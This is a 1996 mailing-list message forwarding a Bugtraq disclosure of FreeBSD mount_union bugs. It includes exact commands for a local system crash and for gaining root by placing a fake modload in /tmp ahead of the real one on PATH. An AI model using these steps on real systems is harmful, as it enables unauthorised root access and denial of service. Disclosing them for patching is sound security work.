Hi folkx,

i only have NetBSD V1.1 here, and sure the 2nd bug described below won't work
(as our mount_union is not setuid root), but the first one got my SS1 running
NetBSD V1.1 to hang.


Hubert

--- Forwarded mail from Bugtraq List <BUGTRAQ@NETSPACE.ORG>

Date:         Fri, 17 May 1996 10:18:24 -0500
Reply-To: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From: Krzysztof Labanowski <CHRISL@gazeta.pl>
Subject:      BoS:       SECURITY BUG in FreeBSD

To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>

Hi!
FreeBSD has a security hole...
dangerous is mount_union if suid is set
vulnerable systems are: FreeBSD 2.1 RELEASE/2.2 CURRENT
probably FreeBSD 2.1 STABLE is not vulnerable
to crash system (as a normal user) try this:
mkdir a
mkdir b
mount_union ~/a ~/b
mount_union -b ~/a ~/b

to got euid try this:
export PATH=/tmp:$PATH #if zsh, of course
echo /bin/sh >/tmp/modload
chmod +x /tmp/modload
mount_union /dir1 /dir2
and You are root!

Hole found by Adam Kubicki

Best wishes
    Chris Labanowski

    KL


---End of forwarded mail from Bugtraq List <BUGTRAQ@NETSPACE.ORG>

-- 
=============== Hubert Feyrer ============================================
      Weekdays: Rennerstr. 19, D-93053 Regensburg, Tel. 0941/943-2905
      Weekends: Bachstr. 40,   D-84066 Mallersdorf, Tel. 08772/6084
      Internet: hubert.feyrer@rz.uni-regensburg.de, IRC: hubertf
==========================================================================